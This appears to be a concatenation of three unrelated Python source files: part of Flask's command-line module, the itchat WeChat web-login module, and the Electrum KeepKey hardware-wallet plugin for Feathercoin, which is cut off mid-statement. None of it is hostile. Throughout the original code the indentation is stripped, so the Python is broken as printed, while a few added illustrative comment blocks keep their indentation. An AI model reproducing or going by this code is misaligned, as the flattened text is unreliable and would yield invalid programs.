.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.exists(".env") or os.path.exists(".flaskenv"):
click.secho(
" * Tip: There are .env files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
)
return
if path is not None:
return dotenv.load_dotenv(path)
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
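# --- Illustrative sketch (not part of Flask) --------------------------------
# A rough manual equivalent of the search above, using python-dotenv directly
# (only meaningful when the optional "dotenv" import at the top succeeded):
def _example_manual_dotenv():
    if dotenv is None:
        return False
    found = dotenv.find_dotenv(".env", usecwd=True)
    if found:
        dotenv.load_dotenv(found)
    return bool(found)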
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(" * Environment: {0}".format(env))
if env == "production":
click.secho(
" WARNING: Do not use the development server in a production"
" environment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(" * Debug mode: {0}".format("on" if debug else "off"))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires pyOpenSSL.", ctx, param
)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
if sys.version_info < (2, 7):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
@click.command("run", short_help="Runs a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loader",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading, with_threads, cert):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
)
@click.command("shell", short_help="Runs a shell in the app context.")
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = "Python %s on %s\nApp: %s [%s]\nInstance: %s" % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup, "r") as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
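# Illustrative output of "flask routes" for a hypothetical app with a single
# "index" view (HEAD and OPTIONS are hidden unless --all-methods is given);
# column widths are computed from the longest entry, so the alignment below
# is only approximate:
#
#   Endpoint  Methods  Rule
#   --------  -------  -----------------------
#   index     GET      /
#   static    GET      /static/<path:filename>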
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
args = sys.argv[1:]
if as_module:
this_module = "flask"
if sys.version_info < (2, 7):
this_module += ".cli"
name = "python -m " + this_module
# Python rewrites "python -m flask" to the path to the file in argv.
# Restore the original command so that the reloader works.
sys.argv = ["-m", this_module] + args
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == "__main__":
main(as_module=True)
|
login.py
|
import os, sys, time, re, io
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
import requests
from pyqrcode import QRCode
from .. import config, utils
from ..returnvalues import ReturnValue
from ..storage.templates import wrap_user_dict
from .contact import update_local_chatrooms, update_local_friends
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive or self.isLogging:
logger.warning('itchat has already logged in.')
return
self.isLogging = True
while self.isLogging:
uuid = push_login(self)
if uuid:
qrStorage = io.BytesIO()
else:
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid():
time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn:
break
logger.info('Login timed out, reloading QR code.')
else:
return # log in process is stopped by user
logger.info('Loading the contact, this may take a little while.')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Logged in successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
self.isLogging = False
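# Illustrative usage (not part of itchat): "core" stands for a Core instance
# on which load_login(core) has been applied; the callbacks are hypothetical
# placeholders and enableCmdQR=2 simply widens the terminal QR code.
def _example_login(core):
    core.login(enableCmdQR=2,
               loginCallback=lambda: logger.info('logged in'),
               exitCallback=lambda: logger.info('logged out'))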
def push_login(core):
cookiesDict = core.s.cookies.get_dict()
if 'wxuin' in cookiesDict:
url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % (
config.BASE_URL, cookiesDict['wxuin'])
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(url, headers=headers).json()
if 'uuid' in r and r.get('ret') in (0, '0'):
core.uuid = r['uuid']
return r['uuid']
return False
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
qrStorage = io.BytesIO()
qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid)
qrCode.png(qrStorage, scale=10)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
if enableCmdQR:
utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR)
else:
with open(picDir, 'wb') as f:
f.write(qrStorage.getvalue())
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=0&r=%s&_=%s' % (
uuid, localTime / 1579, localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
process_login_info(self, r.text)
return '200'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' when login finishes (after scanning the QR code)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
def web_init(self):
url = '%s/webwxinit?r=%s' % (self.loginInfo['url'], int(time.time()))
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User']))
self.memberList.append(self.loginInfo['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
# deal with contact list returned when init
contactList = dic.get('ContactList', [])
chatroomList, otherList = [], []
for m in contactList:
if m['Sex'] != 0:
otherList.append(m)
elif '@@' in m['UserName']:
m['MemberList'] = [] # don't let dirty info pollute the list
chatroomList.append(m)
elif '@' in m['UserName']:
# mp will be dealt in update_local_friends as well
otherList.append(m)
if chatroomList:
update_local_chatrooms(self, chatroomList)
if otherList:
update_local_friends(self, otherList)
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
pass
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList:
self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
chatroomMsg['User'] = self.loginInfo['User']
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.isLogging = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'Logged out successfully.',
'Ret': 0, }})
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Feathercoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
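# Illustrative summary of the two helpers above (the values are members of
# keepkeylib's protobuf types module exposed as self.types):
#   electrum txin type            input script type     output script type
#   'p2pkh'                       SPENDADDRESS          PAYTOADDRESS
#   'p2sh'                        SPENDMULTISIG         PAYTOMULTISIG
#   'p2wpkh', 'p2wsh'             SPENDWITNESS          PAYTOWITNESS
#   'p2wpkh-p2sh', 'p2wsh-p2sh'   SPENDP2SHWITNESS      PAYTOP2SHWITNESS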
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
